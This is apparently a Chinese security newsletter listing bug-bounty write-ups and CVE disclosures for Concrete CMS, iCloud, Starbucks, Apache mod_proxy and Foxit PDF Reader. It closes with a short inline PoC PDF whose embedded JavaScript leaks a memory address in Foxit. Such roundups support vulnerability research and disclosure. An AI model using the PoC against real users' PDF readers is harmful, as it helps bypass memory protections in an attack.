【Concrete CMS】后台路径穿越导致的RCE(CVE-2021-40097) https://hackerone.com/reports/1102067
【Concrete CMS】通过CSRF在日历事件中造成存储XSS漏洞(CVE-2021-40108) https://hackerone.com/reports/1102018
1、价值9000刀的icloud XSS漏洞 https://bountyget.medium.com/how-i-got-9000-usd-by-hacking-into-icloud-80ed8816d3b5
2、 价值5600刀的 mobile.starbucks.com.sg RCE漏洞 https://bountyget.medium.com/rce-on-starbucks-singapore-and-more-for-5600-926c930bb61e
3、 意料之外的越权 https://bountyget.medium.com/unexpected-idor-vulnerability-in-redacted-redacted-net-write-up-95fc6f10de6c
4、 Apache <= 2.4.48 - Mod_Proxy SSRF (CVE-2021-40438) https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40438.yaml https://firzen.de/building-a-poc-for-cve-2021-40438
5、 Foxit PDF Reader 1-day info leak PoC https://twitter.com/l33d0hyun/status/1448963734949412866 poc.pdf
%PDF 1 0 obj <</Pages 1 0 R /OpenAction 2 0 R>> 2 0 obj <</S /JavaScript /JS ( app.alert(util.printf("Leak : %#lx", app)); )>> trailer <</Root 1 0 R>>
